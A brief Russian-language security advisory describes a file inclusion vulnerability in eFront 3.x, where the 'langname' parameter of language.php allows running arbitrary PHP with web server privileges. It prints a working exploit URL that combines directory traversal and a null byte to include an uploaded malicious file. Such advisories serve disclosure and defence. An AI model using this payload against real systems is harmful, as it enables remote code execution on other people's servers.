Программа: eFront 3.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "langname" сценарием www/editor/tiny_mce/langs/language.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://localhost:81/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../
upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00



Оставить мнение